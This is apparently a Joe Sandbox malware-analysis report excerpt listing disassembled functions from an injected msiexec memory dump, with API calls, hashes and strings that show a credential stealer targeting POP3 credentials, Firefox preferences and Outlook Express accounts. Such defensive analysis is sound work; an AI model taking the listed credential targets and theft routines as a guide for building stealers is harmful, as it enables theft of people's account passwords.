                                                                    • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                    • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                    • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                    • String ID:
                                                                    • API String ID: 1999381814-0
                                                                    • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                    • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                    • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                    • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                    Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset
                                                                    • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                    • API String ID: 1297977491-3883738016
                                                                    • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                    • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                    • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                    • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                    Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                      • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                      • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                      • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                      • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset
                                                                    • String ID: gj
                                                                    • API String ID: 438689982-4203073231
                                                                    • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                    • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                    • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                    • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                    Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm$__aullrem
                                                                    • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                    • API String ID: 643879872-978417875
                                                                    • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                    • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                    • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                    • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                    Function 0040DAC2 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040DAE3
                                                                    • memset.MSVCRT ref: 0040DAF7
                                                                    • memset.MSVCRT ref: 0040DB0B
                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                      • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                    • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset$strlen$_memicmp
                                                                    • String ID: user_pref("
                                                                    • API String ID: 765841271-2487180061
                                                                    • Opcode ID: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                    • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                    • Opcode Fuzzy Hash: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                    • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                    Function 00405810 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                    • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                    • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                    • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                    • memset.MSVCRT ref: 004058C3
                                                                    • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                    • SetFocus.USER32(?), ref: 00405976
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$FocusItemmemset
                                                                    • String ID:
                                                                    • API String ID: 4281309102-0
                                                                    • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                    • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                    • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                    • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                    Function 0040A83A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                    • _mbscat.MSVCRT ref: 0040A8FF
                                                                    • sprintf.MSVCRT ref: 0040A921
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite_mbscatsprintfstrlen
                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                    • API String ID: 1631269929-4153097237
                                                                    • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                    • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                    • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                    • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                    Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040810E
                                                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,67CE7B60,?), ref: 004081B9
                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                    • String ID: POP3_credentials$POP3_host$POP3_name
                                                                    • API String ID: 524865279-2190619648
                                                                    • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                    • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                    • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                    • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                    Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$CountInfomemsetstrchr
                                                                    • String ID: 0$6
                                                                    • API String ID: 2300387033-3849865405
                                                                    • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                    • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                    • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                    • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                    Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004076D7
                                                                    • sprintf.MSVCRT ref: 00407704
                                                                    • strlen.MSVCRT ref: 00407710
                                                                    • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                    • strlen.MSVCRT ref: 00407733
                                                                    • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpystrlen$memsetsprintf
                                                                    • String ID: %s (%s)
                                                                    • API String ID: 3756086014-1363028141
                                                                    • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                    • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                    • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                    • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                    Function 00410863 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                    • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                    • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                    Strings
                                                                    • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                    • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FromStringUuid$FreeTaskmemcpy
                                                                    • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                    • API String ID: 1640410171-3316789007
                                                                    • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                    • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                    • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                    • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                    Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscat$memsetsprintf
                                                                    • String ID: %2.2X
                                                                    • API String ID: 125969286-791839006
                                                                    • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                    • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                    • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                    • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                    Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                    • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                      • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                      • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                      • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                      • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                      • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                      • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                      • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                    • CloseHandle.KERNEL32(?), ref: 00444206
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                    • String ID: ACD
                                                                    • API String ID: 82305771-620537770
                                                                    • Opcode ID: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                    • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                    • Opcode Fuzzy Hash: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                    • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                    Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004091EC
                                                                    • sprintf.MSVCRT ref: 00409201
                                                                      • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                      • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                      • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                    • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                    • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                    • String ID: caption$dialog_%d
                                                                    • API String ID: 2923679083-4161923789
                                                                    • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                    • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                    • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                    • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                    Function 00426918 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                    Strings
                                                                    • unknown error, xrefs: 004277B2
                                                                    • no such savepoint: %s, xrefs: 00426A02
                                                                    • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                    • abort due to ROLLBACK, xrefs: 00428781
                                                                    • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                    • API String ID: 3510742995-3035234601
                                                                    • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                    • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                    • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                    • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                    Function 0042B927 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                    • API String ID: 2221118986-3608744896
                                                                    • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                    • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                    • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                    • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                    Function 004429A4 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 259COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                      • Part of subcall function 0044257F: memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcmpmemcpy
                                                                    • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                    • API String ID: 1784268899-4153596280
                                                                    • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                    • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                                    • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                    • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                                    Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                    • memset.MSVCRT ref: 00410246
                                                                    • memset.MSVCRT ref: 00410258
                                                                      • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                    • memset.MSVCRT ref: 0041033F
                                                                    • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                    • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                    • String ID:
                                                                    • API String ID: 3974772901-0
                                                                    • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                    • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                    • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                    • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                    Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • wcslen.MSVCRT ref: 0044406C
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                    • strlen.MSVCRT ref: 004440D1
                                                                      • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                      • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                    • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
